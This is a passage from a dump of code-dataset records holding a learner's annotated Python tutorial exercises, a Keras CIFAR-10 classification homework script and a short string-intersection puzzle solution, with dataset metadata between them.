'lamb']\nfor i in range(len(a)):\n print(i, a[i])\nprint(range(10))\nprint(list(range(5)))\nfor n in range(2, 10):\n for x in range(2, n):\n if n % x == 0:\n print(n, 'equals', x, '*', n//x)\n break\n else:\n # loop fell through without finding a factor, aka break statement isnt triggered\n print(n, 'is a prime number')\nfor num in range(2, 10):\n if num % 2 == 0:\n print(\"Found an even number\", num)\n continue\n print(\"Found a number\", num)\n \n# function definition\ndef fib(n): # write Fibonacci series up to n\n \"\"\"Print a Fibonacci series up to n.\"\"\"\n a, b = 0, 1\n while a < n:\n print(a, end=' ')\n a, b = b, a+b\n print()\n \n# Now call the function we just defined:\nfib(2000)\nprint(fib) # \nf = fib\nf(100)\nfib(0)\nprint(fib(0)) # None\n\ndef fib2(n): # return Fibonacci series up to n\n \"\"\"Return a list containing the Fibonacci series up to n.\"\"\"\n result = []\n a, b = 0, 1\n while a < n:\n result.append(a) # see below\n a, b = b, a+b\n return result\n\nf100 = fib2(100) # call it\nprint(f100) # write the result\n\ndef ask_ok(prompt, retries=4, reminder='Please try again!'):\n while True:\n ok = input(prompt)\n if ok in ('y', 'ye', 'yes'):\n return True\n if ok in ('n', 'no', 'nop', 'nope'):\n return False\n retries = retries - 1\n if retries < 0:\n raise ValueError('invalid user response')\n print(reminder)\n\nprint(ask_ok('Do you really want to quit? '))\nprint(ask_ok('OK to overwrite the file? ', 2))\nprint(ask_ok('OK to overwrite the file? ', 2, 'Come on, only yes or no!'))\n\ni = 5\ndef f(arg=i):\n print(arg)\ni = 6\nf() # prints 5 because default argument only evaluated once, at function definition\n\ndef f2(a, L=[]):\n L.append(a) # appends to each item, L is a reference to a list\n return L\n\nprint(f2(1)) # [1]\nprint(f2(2)) # [1, 2]\nprint(f2(3)) # [1, 2, 3]\n\ndef f3(a, L=None):\n if L is None:\n L = []\n L.append(a) # appends a to L; if L not passed, returns [a]\n return L\n\nprint(f3(1)) # [1]\nprint(f3(2)) # [2]\nprint(f3(3)) # [3]\nprint(f3(3, [1, 2])) # [1, 2, 3]\n\ndef parrot(voltage, state='a stiff', action='voom', ptype='Norwegian Blue'): # keyword arguments, kwarg = value\n print(\"-- This parrot wouldn't\", action, end=' ')\n print(\"if you put\", voltage, \"volts through it.\")\n print(\"-- Lovely plumage, the\", ptype)\n print(\"-- It's\", state, \"!\")\n\n# these are all valid\nparrot(1000) # 1 positional argument\nparrot(voltage=1000) # 1 keyword argument\nparrot(voltage=1000000, action='VOOOOOM') # 2 keyword arguments\nparrot(action='VOOOOOM', voltage=1000000) # 2 keyword arguments\nparrot('a million', 'bereft of life', 'jump') # 3 positional arguments\nparrot('a thousand', state='pushing up the daisies') # 1 positional, 1 keyword\n# invalid would be: \n# parrot() # required argument missing\n# parrot(voltage=5.0, 'dead') # non-keyword argument after a keyword argument\n# parrot(110, voltage=220) # duplicate value for the same argument\n# parrot(actor='John Cleese') # unknown keyword argument\n\ndef cheeseshop(kind, *arguments, **keywords): # accepts a mandatory arg, then args and kwargs\n print(\"-- Do you have any\", kind, \"?\")\n print(\"-- I'm sorry, we're all out of\", kind)\n for arg in arguments:\n print(arg)\n print(\"-\" * 40)\n for kw in keywords:\n print(kw, \":\", keywords[kw])\n \ncheeseshop(\"Limburger\", \"It's very runny, sir.\", # arg, *args, *kwargs\n \"It's really very, VERY runny, sir.\",\n shopkeeper=\"Michael Palin\",\n client=\"John Cleese\",\n sketch=\"Cheese Shop Sketch\")\ncheeseshop(\"Limburger\") # arg only\n\ndef concat(*args, sep=\"/\"): # anything after *args is keyword-only\n return sep.join(args)\n\nprint(concat(\"earth\", \"mars\", \"venus\")) # 'earth/mars/venus'\nprint(concat(\"earth\", \"mars\", \"venus\", sep=\".\")) # 'earth.mars.venus'\n\nprint(list(range(3, 6))) # normal call with separate arguments, [3, 4, 5]\nargs = [3, 6]\nprint(list(range(*args))) # call with arguments unpacked from a list using the *, [3, 4, 5]\n\ndef parrot2(voltage, state='a stiff', action='voom'):\n print(\"-- This parrot wouldn't\", action, end=' ')\n print(\"if you put\", voltage, \"volts through it.\", end=' ')\n print(\"E's\", state, \"!\")\n\nd = {\"voltage\": \"four million\", \"state\": \"bleedin' demised\", \"action\": \"VOOM\"}\nparrot2(**d) # unpack kwargs with **\n\ndef make_incrementor(n):\n return lambda x: x + n\n\nf = make_incrementor(42)\nprint(f(0)) # 42\nprint(f(1)) # 43\n\npairs = [(1, 'one'), (2, 'two'), (3, 'three'), (4, 'four')]\npairs.sort(key=lambda pair: pair[1])\nprint(pairs) # [(4, 'four'), (1, 'one'), (3, 'three'), (2, 'two')]\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 5: Data Structures\nfruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana']\nprint(fruits.count('apple')) # 2\nprint(fruits.count('tangerine')) # 0\nprint(fruits.index('banana')) # 3, for 1st appearance\nprint(fruits.index('banana', 4)) # 6, Find next banana starting a position 4\nfruits.reverse()\nprint(fruits) # ['banana', 'apple', 'kiwi', 'banana', 'pear', 'apple', 'orange']\nfruits.append('grape')\nprint(fruits) # ['banana', 'apple', 'kiwi', 'banana', 'pear', 'apple', 'orange', 'grape']\nfruits.sort() # here, sorts alphabetically\nprint(fruits) # ['apple', 'apple', 'banana', 'banana', 'grape', 'kiwi', 'orange', 'pear']\nprint(fruits.pop()) # 'pear'\n\nstack = [3, 4, 5]\nstack.append(6)\nstack.append(7)\nprint(stack) # [3, 4, 5, 6, 7]\nprint(stack.pop()) # 7\nprint(stack) # [3, 4, 5, 6]\nstack.pop() # 6\nstack.pop() # 5\nprint(stack) # [3, 4]\n\nsquares = []\nfor x in range(10):\n squares.append(x**2)\nprint(squares) # [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]\nsquares = list(map(lambda x: x**2, range(10)))\nprint(squares) # same thing\nsquares = [x**2 for x in range(10)]\nprint(squares) # same thing again\n\n# list comprehensions\nprint([(x, y) for x in [1,2,3] for y in [3,1,4] if x != y]) # [(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)]\ncombs = []\nfor x in [1,2,3]:\n for y in [3,1,4]:\n if x != y:\n combs.append((x, y))\nprint(combs) # same thing: [(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)]\n\nvec = [-4, -2, 0, 2, 4] \nprint([x*2 for x in vec]) # create a new list with the values doubled, [-8, -4, 0, 4, 8]\nprint([x for x in vec if x >= 0]) # filter the list to exclude negative numbers, [0, 2, 4]\nprint([abs(x) for x in vec]) # apply a function to all the elements, [4, 2, 0, 2, 4]\nfreshfruit = [' banana', ' loganberry ', 'passion fruit ']\nprint([weapon.strip() for weapon in freshfruit]) # call a method on each element, ['banana', 'loganberry', 'passion fruit']\nprint([(x, x**2) for x in range(6)]) # create a list of 2-tuples like (number, square), [(0, 0), (1, 1), (2, 4), (3, 9), (4, 16), (5, 25)]\nvec = [[1,2,3], [4,5,6], [7,8,9]]\nprint([num for elem in vec for num in elem]) # flatten a list using a listcomp with two 'for', [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n# nested list comprehensions\nmatrix = [\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n ]\nprint([[row[i] for row in matrix] for i in range(4)]) # transpose, [[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]\ntransposed = []\nfor i in range(4):\n transposed.append([row[i] for row in matrix])\nprint(transposed) # same thing, [[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]\ntransposed = []\nfor i in range(4):\n # the following 3 lines implement the nested listcomp\n transposed_row = []\n for row in matrix:\n transposed_row.append(row[i])\n transposed.append(transposed_row)\nprint(transposed) # same thing again, [[1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12]]\nprint(list(zip(*matrix))) # tuples now, but transposed: [(1, 5, 9), (2, 6, 10), (3, 7, 11), (4, 8, 12)]\n\na = [-1, 1, 66.25, 333, 333, 1234.5]\ndel a[0]\nprint(a) # [1, 66.25, 333, 333, 1234.5]\ndel a[2:4]\nprint(a) # [1, 66.25, 1234.5]\ndel a[:]\nprint(a) # []\ndel a\n\n# tuples\nt = 12345, 54321, 'hello!'\nprint(t[0]) # 12345\nprint(t) # (12345, 54321, 'hello!')\nv = ([1, 2, 3], [3, 2, 1])\nprint(v) # ([1, 2, 3], [3, 2, 1])\nempty = ()\nsingleton = 'hello', # <-- note trailing comma\nlen(empty) # 0\nlen(singleton) # 1\nprint(singleton) # ('hello',)\nx, y, z = t\nprint(x) # 12345\nprint(y) # 54321\nprint(z) # 'hello!'\n\n# sets\nbasket = {'apple', 'orange', 'apple', 'pear', 'orange', 'banana'}\n# show that duplicates have been removed\nprint(basket) # {'orange', 'banana', 'pear', 'apple'}\n# fast membership testing\nprint('orange' in basket) # True\nprint('crabgrass' in basket) # False\n# Demonstrate set operations on unique letters from two words\na = set('abracadabra')\nb = set('alacazam')\nprint(a) # unique letters in a, {'a', 'r', 'b', 'c', 'd'}\nprint(a - b) # letters in a but not in b, {'r', 'd', 'b'}\nprint(a | b) # letters in a or b or both, {'a', 'c', 'r', 'd', 'b', 'm', 'z', 'l'}\nprint(a & b) # letters in both a and b, {'a', 'c'}\nprint(a ^ b) # letters in a or b but not both, {'r', 'd', 'b', 'm', 'z', 'l'}\na = {x for x in 'abracadabra' if x not in 'abc'} # list comprehension on a set\nprint(a) # {'r', 'd'}\n\n# dictionaries\ntel = {'jack': 4098, 'sape': 4139}\ntel['guido'] = 4127\nprint(tel) # {'jack': 4098, 'sape': 4139, 'guido': 4127}\nprint(tel['jack']) # 4098\ndel tel['sape']\ntel['irv'] = 4127\nprint(tel) # {'jack': 4098, 'guido': 4127, 'irv': 4127}\nprint(list(tel)) # ['jack', 'guido', 'irv']\nprint(sorted(tel)) # ['guido', 'irv', 'jack']\nprint('guido' in tel) # True\nprint('jack' not in tel) # False\nprint(dict([('sape', 4139), ('guido', 4127), ('jack', 4098)])) # {'sape': 4139, 'guido': 4127, 'jack': 4098}\nprint(dict(sape=4139, guido=4127, jack=4098)) # {'sape': 4139, 'guido': 4127, 'jack': 4098}\nprint({x: x**2 for x in (2, 4, 6)}) # {2: 4, 4: 16, 6: 36}\n\n# looping techniques\nknights = {'gallahad': 'the pure', 'robin': 'the brave'}\nfor k, v in knights.items(): # unpacks\n print(k, v)\nfor i, v in enumerate(['tic', 'tac', 'toe']): # pulls indices and values\n print(i, v)\nquestions = ['name', 'quest', 'favorite color'] # use zip to compare 2 lists\nanswers = ['lancelot', 'the holy grail', 'blue']\nfor q, a in zip(questions, answers):\n print('What is your {0}? It is {1}.'.format(q, a))\nfor i in reversed(range(1, 10, 2)): # count backwards\n print(i)\nbasket = ['apple', 'orange', 'apple', 'pear', 'orange', 'banana']\nfor f in sorted(set(basket)): # sort but leave original item unaltered\n print(f)\nimport math\nraw_data = [56.2, float('NaN'), 51.7, 55.3, 52.5, float('NaN'), 47.8]\nfiltered_data = []\nfor value in raw_data:\n if not math.isnan(value):\n filtered_data.append(value)\nprint(filtered_data) # [56.2, 51.7, 55.3, 52.5, 47.8]\n\n# more conditions\n# in, not in: check if contained (or not)\n# is, is not: check for exactness (or not)\n# a < b == c: operators can be chained\n# A and not B or C is equivalent to (A and (not B)) or C\nstring1, string2, string3 = '', 'Trondheim', 'Hammer Dance'\nnon_null = string1 or string2 or string3\nprint(non_null) # 'Trondheim'\n# assignment cannot occur inside expressions\nprint((1, 2, 3) < (1, 2, 4)) # all 7 will print True\nprint([1, 2, 3] < [1, 2, 4])\nprint('ABC' < 'C' < 'Pascal' < 'Python')\nprint((1, 2, 3, 4) < (1, 2, 4))\nprint((1, 2) < (1, 2, -1))\nprint((1, 2, 3) == (1.0, 2.0, 3.0))\nprint((1, 2, ('aa', 'ab')) < (1, 2, ('abc', 'a'), 4))\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 6: Modules\nimport fibo # customarily at the beginning\nfibo.fibo(1000) # 0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610 987\nprint(fibo.fibo2(100)) # [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nprint(fibo.__name__) # 'fibo'\nfibo = fibo.fibo # assign a local name\nfibo(500) # 0 1 1 2 3 5 8 13 21 34 55 89 144 233 377\ndel fibo\nfrom fibo import fibo, fibo2 # directly imports without having to assign local name\nfibo(500) # 0 1 1 2 3 5 8 13 21 34 55 89 144 233 377\nimport sys, builtins\nprint(dir(fibo))\nprint(dir(sys))\nprint(dir(builtins))\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 7: Input and Output\nyear = 2016\nevent = 'Referendum'\nprint(f'Results of the {year} {event}') # 'Results of the 2016 Referendum', formaatted string literals\nyes_votes = 42_572_654\nno_votes = 43_132_495\npercentage = yes_votes / (yes_votes + no_votes)\nprint('{:-9} YES votes {:2.2%}'.format(yes_votes, percentage)) # ' 42572654 YES votes 49.67%'\ns = 'Hello, world.'\nprint(str(s)) # 'Hello, world.'\nprint(repr(s)) # \"'Hello, world.'\"\nprint(str(1/7)) # '0.14285714285714285'\nx = 10 * 3.25\ny = 200 * 200\ns = 'The value of x is ' + repr(x) + ', and y is ' + repr(y) + '...'\nprint(s) # The value of x is 32.5, and y is 40000...\n# The repr() of a string adds string quotes and backslashes:\nhello = 'hello, world\\n'\nhellos = repr(hello)\nprint(hellos) # 'hello, world\\n'\n# The argument to repr() may be any Python object:\nprint(repr((x, y, ('spam', 'eggs')))) # \"(32.5, 40000, ('spam', 'eggs'))\"\nimport math\nprint(f'The value of pi is approximately {math.pi:.3f}.') # The value of pi is approximately 3.142. // formatted string literal\ntable = {'Sjoerd': 4127, 'Jack': 4098, 'Dcab': 7678}\nfor name, phone in table.items():\n print(f'{name:10} ==> {phone:10d}') # use the : to make it a certain number of characters; helps with alignment\nanimals = 'eels'\nprint(f'My hovercraft is full of {animals}.') # My hovercraft is full of eels. '!a' applies ascii(), '!s' applies str()\nprint(f'My hovercraft is full of {animals!r}.') # My hovercraft is full of 'eels'. '!r' applies repr()\nprint('We are the {} who say \"{}!\"'.format('knights', 'Ni')) # We are the knights who say \"Ni!\" via str.format()\nprint('{0} and {1}'.format('spam', 'eggs')) # spam and eggs\nprint('{1} and {0}'.format('spam', 'eggs')) # eggs and spam\nprint('This {food} is {adjective}.'.format(food='spam', adjective='absolutely horrible')) # This spam is absolutely horrible.\nprint('The story of {0}, {1}, and {other}.'.format('Bill', 'Manfred', other='Georg')) # The story of Bill, Manfred, and Georg.\ntable = {'Sjoerd': 4127, 'Jack': 4098, 'Dcab': 8637678}\nprint('Jack: {0[Jack]:d}; Sjoerd: {0[Sjoerd]:d}; Dcab: {0[Dcab]:d}'.format(table)) # Jack: 4098; Sjoerd: 4127; Dcab: 8637678 via []\nprint('Jack: {Jack:d}; Sjoerd: {Sjoerd:d}; Dcab: {Dcab:d}'.format(**table)) # Jack: 4098; Sjoerd: 4127; Dcab: 8637678 via kwargs\nfor x in range(1, 11):\n print('{0:2d} {1:3d} {2:4d}'.format(x, x*x, x*x*x))\nfor x in range(1, 11):\n print(repr(x).rjust(2), repr(x*x).rjust(3), end=' ')\n # Note use of 'end' on previous line\n print(repr(x*x*x).rjust(4))\nprint('12'.zfill(5)) # '00012'\nprint('-3.14'.zfill(7)) # '-003.14'\nprint('3.14159265359'.zfill(5)) # '3.14159265359'\nprint('The value of pi is approximately %5.3f.' % math.pi) # The value of pi is approximately 3.142. old-school style\nf = open('workfile', 'w') # 'r' read (assumed if omitted), 'w' writing (an existing file will be erased), 'a' appending, 'r+' both reading and writing\nprint(f.write('This is a test\\n')) # prints # of chars written, 15\nvalue = ('the answer', 42)\ns = str(value) # convert the tuple to string\nprint(f.write(s)) # 18\nf.close()\nwith open('workfile') as f:\n for line in f:\n print(line, end='') # prints the above two lines\nprint('\\n' + str(f.closed)) # True\nf = open('workfile2', 'wb')\nf.close()\nf = open('workfile2', 'r+b')\nprint(f.write(b'0123456789abcdef')) # 16\nprint(f.seek(5)) # Go to the 6th byte in the file, returns char index\nprint(f.read(1)) # b'5'\nprint(f.seek(-3, 2)) # Go to the 3rd byte before the end\nprint(f.read(1)) # b'd'\nf.close()\n\n# Saving structured data with JSON (JavaScript Object Notation)\nimport json\nprint(json.dumps([1, 'simple', 'list'])) # '[1, \"simple\", \"list\"]'\nx = [1, 'simple', 'list']\nf = open('jsonfile', 'w')\nf.close()\nwith open('jsonfile', 'r+') as f:\n json.dump(x, f)\n f.seek(0) # otherwise it tries to read from end of file\n x = json.load(f)\n print(x)\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 8: Errors and Exceptions\nwhile True: # repeats until a number is entered\n try:\n x = int(input(\"Please enter a number: \"))\n break\n except ValueError:\n print(\"Oops! That was no valid number. Try again...\")\n\nclass B(Exception):\n pass\nclass C(B):\n pass\nclass D(C):\n pass\nfor cls in [B, C, D]: # prints B, C, D\n try:\n raise cls()\n except D:\n print(\"D\")\n except C:\n print(\"C\")\n except B: # must be last, or it will print B, B, B as D is an extension of C is an extension of B\n print(\"B\")\n\ntry:\n arg = 'myfile.txt'\n f = open(arg)\n s = f.readline()\n i = int(s.strip())\nexcept OSError as err:\n print(\"OS error: {0}\".format(err))\nexcept ValueError:\n print(\"Could not convert data to an integer.\")\nexcept:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\nelse: # runs if no exception\n f.seek(0)\n print(arg, 'has', len(f.readlines()), 'lines')\n f.close()\n\ntry:\n raise Exception('spam', 'eggs') # force raising exception\n raise ValueError # shorthand for 'raise ValueError()'\nexcept Exception as inst:\n print(type(inst)) # the exception instance\n print(inst.args) # arguments stored in .args\n print(inst) # __str__ allows args to be printed directly, but may be overridden in exception subclasses\n x, y = inst.args # unpack args\n print('x =', x)\n print('y =', y)\n\ndef this_fails():\n x = 1/0\ntry:\n this_fails() # exceptions handled in called functions by try clause\nexcept ZeroDivisionError as err:\n print('Handling run-time error:', err) # Handling run-time error: division by zero\nfinally: # always runs\n print('Goodbye, world!')\n \n# User-defined exceptions\nclass Error(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\nclass InputError(Error):\n \"\"\"Exception raised for errors in the input.\n Attributes:\n \n expression -- input expression in which the error occurred\n message -- explanation of the error\n \"\"\"\n def __init__(self, expression, message):\n self.expression = expression\n self.message = message\nclass TransitionError(Error):\n \"\"\"Raised when an operation attempts a state transition that's not\n allowed.\n \n Attributes:\n previous -- state at beginning of transition\n next -- attempted new state\n message -- explanation of why the specific transition is not allowed\n \"\"\"\n def __init__(self, previous, next, message):\n self.previous = previous\n self.next = next\n self.message = message\n\ndef divide(x, y):\n try:\n result = x / y\n except ZeroDivisionError:\n print(\"division by zero!\")\n else:\n print(\"result is\", result)\n finally:\n print(\"executing finally clause\")\ndivide(2, 1)\ndivide(2, 0)\n# divide(\"2\", \"1\") # returns TypeError\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 9: Classes\ndef scope_test():\n def do_local():\n spam = \"local spam\"\n def do_nonlocal():\n nonlocal spam\n spam = \"nonlocal spam\"\n def do_global():\n global spam\n spam = \"global spam\"\n spam = \"test spam\"\n do_local()\n print(\"After local assignment:\", spam) # test spam; changed in local scope of function only\n do_nonlocal()\n print(\"After nonlocal assignment:\", spam) # nonlocal spam; change in nonlocal scope aka the module\n do_global()\n print(\"After global assignment:\", spam) # nonlocal spam: global value of spam (not module-local) changed\nscope_test()\nprint(\"In global scope:\", spam) # global spam; changed in module function\n\nclass MyClass:\n \"\"\"A simple example class\"\"\"\n i = 12345\n def f(self):\n return 'hello world'\n def __init__(self):\n self.data = []\n\nx = MyClass\n\nclass Complex:\n def __init__(self, realpart, imagpart):\n self.r = realpart\n self.i = imagpart\n \nx = Complex(3.0, -4.5)\nx.counter = 1 # can create fields at runtime\nwhile x.counter < 10:\n x.counter = x.counter * 2\nprint(x.counter) # 16\ndel x.counter\nprint(x.r, x.i) # (3.0, -4.5)\n\nclass Dog:\n\n kind = 'canine' # class variable shared by all instances\n tricks = [] # mistaken use of a class variable\n\n def __init__(self, name):\n self.name = name # instance variable unique to each instance\n# self.tricks = [] # creates a new empty list for each dog; should be here to get correct result\n def add_trick(self, trick):\n self.tricks.append(trick)\n\nd = Dog('Fido')\ne = Dog('Buddy')\nprint(d.kind) # shared by all dogs, 'canine'\nprint(e.kind) # shared by all dogs, 'canine'\nprint(d.name) # unique to d, 'Fido'\nprint(e.name) # unique to e, 'Buddy'\nd.add_trick('roll over')\ne.add_trick('play dead')\nprint(d.tricks) # unexpectedly shared by all dogs, ['roll over', 'play dead']\n\n# Function defined outside the class\ndef f1(self, x, y):\n return min(x, x+y)\n\nclass C2:\n f = f1\n\n def g(self):\n return 'hello world'\n\n h = g\n \nclass Bag:\n def __init__(self):\n self.data = []\n\n def add(self, x):\n self.data.append(x)\n\n def addtwice(self, x):\n self.add(x)\n self.add(x)\n \nclass C3(C2): # derived class / inheritance\n def add(self, x):\n self.data.append(str(x)) # overrides method; now calling addtwice on a Bag will call this twice\n\nclass Mapping:\n def __init__(self, iterable):\n self.items_list = []\n self.__update(iterable)\n\n def update(self, iterable):\n for item in iterable:\n self.items_list.append(item)\n\n __update = update # private copy of original update() method\n\nclass MappingSubclass(Mapping):\n\n def update(self, keys, values):\n # provides new signature for update()\n # but does not break __init__()\n for item in zip(keys, values):\n self.items_list.append(item)\n\nclass Employee:\n pass\n\njohn = Employee() # Create an empty employee record\n\n# Fill the fields of the record\njohn.name = 'John Doe'\njohn.dept = 'computer lab'\njohn.salary = 1000\n\nfor element in [1, 2, 3]:\n print(element)\nfor element in (1, 2, 3):\n print(element)\nfor key in {'one':1, 'two':2}:\n print(key)\nfor char in \"123\":\n print(char)\nfor line in open(\"myfile.txt\"):\n print(line, end='')\nprint()\n\ns = 'abc'\nit = iter(s)\nprint(it) # \nfor i in range(len(s) + 1):\n try:\n print(next(it)) # 'a', 'b', 'c'\n except:\n print(\"Error:\", sys.exc_info()[0])\n\nclass Reverse:\n \"\"\"Iterator for looping over a sequence backwards.\"\"\"\n def __init__(self, data):\n self.data = data\n self.index = len(data)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index == 0:\n raise StopIteration\n self.index = self.index - 1\n return self.data[self.index]\n\nrev = Reverse('spam')\nprint(iter(rev)) # <__main__.Reverse object at 0x00A1DB50>\nfor char in rev:\n print(char) # 'm', 'a', 'p', 's'\n\ndef reverse(data):\n for index in range(len(data)-1, -1, -1):\n yield data[index]\n\nfor char in reverse('golf'):\n print(char) # 'f', 'l', 'o', 'g'\n \nprint(sum(i*i for i in range(10))) # sum of squares, 285\nxvec = [10, 20, 30]\nyvec = [7, 5, 3]\nprint(sum(x*y for x,y in zip(xvec, yvec))) # dot product, 260\n\nfrom math import pi, sin\nsine_table = {x: sin(x*pi/180) for x in range(0, 91)}\n\ndata = 'golf'\nprint(list(data[i] for i in range(len(data)-1, -1, -1))) # ['f', 'l', 'o', 'g']\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 10: StdLib 1\n\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 11: StdLib 2\n\n\n#----------------------------------------------------------------------------------------------------------------------------------------\n\n# Section 12: Virtual Environments and Packages\n","sub_path":"Python/PythonTutorial/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":27755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"353102542","text":"from __future__ import print_function\n\n# To plot graphs.\nimport numpy as np\n\nimport sys\n\nfrom tools import collage\nfrom tools import readCIFAR\nfrom matplotlib import pyplot as plt\n\n\n# Example showing how to train and use a Convolutional Neural Network in Keras.\n#\n# You need Keras, OpenCV and tensorflow\n# Install the needed libraries by:\n# pip install keras tensorflow matplotlib\n# If you have cuda-capable GPU, install tensorflow-gpu to make the training\n# much faster.\n#\n# You can use prepared environmenet on merlin.fit.vutbr.cz\n# source /mnt/matylda1/hradis/POV/du03_env/bin/activate\n#\n# The code is compatible only with tensorflow backend. On Merlin, run it by:\n# KERAS_BACKEND=tensorflow python du03.py\n#\n# The KERAS_BACKEND=tensorflow would not bee needed on your own machine as this\n# would be specified in Keras configuration.\n#\n# Get the dataset first by:\n# cd ./data\n# ./downloadCIFAR.sh\n#\n# Feel free to experiment with the network to reach better accuracy.\n# It is possible to get ~92% accuracy using larger network of similar arch.\n# To compare to others, look at:\n# http://rodrigob.github.io/are_we_there_yet/build/classification_datasets_results.html#43494641522d3130\n\n\n# Define network.\n# Input: batch of images 32x32x3\n# Use ReLU nonlinearities after each layer with optimized parameters.\n# Layers:\n# Convolution with 8 3x3 filters\n# Max-pooling with step 2 and pooling area 2x2\n# Convolution with 16 3x3 filters\n# Max-pooling with step 2 and pooling area 2x2\n# Fully connected layer with 256 neurons\n# Dropout with probability 15%\n# Fully connected layer with 256 neurons\n# Dropout with probability 15%\n# Fully connected layer with 10 neurons and softmax activation\n# The last layer will produce probabilities for the 10 classes in CIFAR-10 and\n# it is the output of the model.\ndef build_simple_network():\n # Thease are the layers you need for the network.\n # Documentation is at https://keras.io/layers/core/\n #\n # You can build either sequential model which is simple but restricts the\n # network to single input and single output.\n # https://keras.io/getting-started/sequential-model-guide/\n #\n # Or you can use functional API to build the network which is more\n # flexible and explicitly specifies connections between layers.\n # https://keras.io/getting-started/functional-api-guide/\n from keras.layers import Input, Dense, Dropout, Flatten\n from keras.layers import Conv2D, MaxPooling2D\n from keras.models import Model, Sequential\n\n # FILL\n model = Sequential()\n\n model.add(Conv2D(8, (3, 3), strides=2, input_shape = (32, 32, 3), activation = 'relu'))\n model.add(MaxPooling2D(pool_size = (2, 2)))\n model.add(Conv2D(16, (3, 3), strides=2, activation = 'relu'))\n model.add(MaxPooling2D(pool_size = (2, 2)))\n model.add(Flatten())\n model.add(Dense(256, activation = 'relu'))\n model.add(Dropout(0.15))\n model.add(Dense(256, activation = 'relu'))\n model.add(Dropout(0.15))\n model.add(Dense(10, activation = 'softmax'))\n\n return model\n\n\n# Get the dataset first by:\n# cd ./data\n# ./downloadCIFAR.sh\ndef prepareData(downsample=1):\n # This reads the dataset.\n trnData, tstData, trnLabels, tstLabels = readCIFAR(\n './data/cifar-10-batches-py')\n print('\\nDataset tensors')\n print('Training shapes: ', trnData.shape, trnLabels.shape)\n print('Testing shapes: ', tstData.shape, tstLabels.shape)\n print()\n\n # Convert images from RGB to BGR\n trnData = trnData[::downsample, :, :, ::-1]\n tstData = tstData[::downsample, :, :, ::-1]\n trnLabels = trnLabels[::downsample]\n tstLabels = tstLabels[::downsample]\n\n # Normalize data\n # This maps all values in trn. and tst. data to range <-0.5,0.5>.\n # Some kind of value normalization is preferable to provide\n # consistent behavior accross different problems and datasets.\n trnData = trnData.astype(np.float32) / 255.0 - 0.5\n tstData = tstData.astype(np.float32) / 255.0 - 0.5\n return trnData, tstData, trnLabels, tstLabels\n\n\ndef main():\n\n model = build_simple_network()\n print('Model summary:')\n model.summary()\n\n from keras import optimizers\n from keras import losses\n from keras import metrics\n model.compile(\n loss=losses.sparse_categorical_crossentropy,\n optimizer=optimizers.Adam(lr=0.001),\n metrics=[metrics.sparse_categorical_accuracy])\n\n\n trnData, tstData, trnLabels, tstLabels = prepareData()\n # Show 64 images from each set.\n trnCollage = collage(trnData[:64] + 0.5)\n tstCollage = collage(tstData[:64] + 0.5)\n \n plt.imshow(trnCollage)\n plt.title('Training data')\n plt.show()\n plt.imshow(tstCollage)\n plt.title('Testing data')\n plt.show()\n\n # Train the network for 5 epochs.\n model.fit(\n x=trnData, y=trnLabels,\n batch_size=64, epochs=5, verbose=1,\n validation_data=[tstData, tstLabels], shuffle=True)\n\n\n # To save the network use:\n model.save('model.h5')\n\n # Compute network predictions for the test set and show results.\n print('Compute model predictions for test images and display the results.')\n\n dataToTest = tstData[::20]\n\n # Compute network (model) responses for dataToTest input.\n # This should produce a 2D tensor of the 10 class probabilites for each\n # image in dataToTest. The subsequent code displays the predicted classes.\n # FILL\n classProb = model.predict(dataToTest)\n\n print('Prediction shape:', classProb.shape)\n\n classes = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog',\n 'horse', 'ship', 'truck']\n predictedClasses = np.argmax(classProb, axis=1)\n for i in range(classProb.shape[1]):\n classImages = dataToTest[predictedClasses == i]\n if classImages.shape[0]:\n classCollage = collage(classImages)\n title = 'Predicted class {} - {}'.format(i, classes[i])\n plt.imshow(classCollage + 0.5)\n plt.title(title)\n plt.show()\n\n\n print('Evaluate network error outside of training.')\n loss, acc = model.evaluate(x=tstData, y=tstLabels, batch_size=64)\n print()\n print('Test loss', loss)\n print('Test accuracy', acc)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"3_semestr/POVa/Proj3/du03.py","file_name":"du03.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"576804364","text":"\"\"\"\n2\nhello\nworld\nhi\nworld\n\nSample Output\nYES\nNO\n\nExplanation\nFor the 1st test case, the letter o is common between both strings, hence the answer YES.\nFor the 2nd test case, hi and world do not have a common substring, hence the answer NO.\n\"\"\"\nn = int(input())\nfor _ in range(n):\n\ts1 = set(str(input()))\n\ts2 = set(str(input()))\n\tif set.intersection(s1, s2):\n\t\tprint(\"YES\")\n\telse:\n\t\tprint(\"NO\")","sub_path":"Strings/twostrings.py","file_name":"twostrings.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"485212280","text":"import importlib\nfrom hydroDL.master import basins\nfrom hydroDL.app 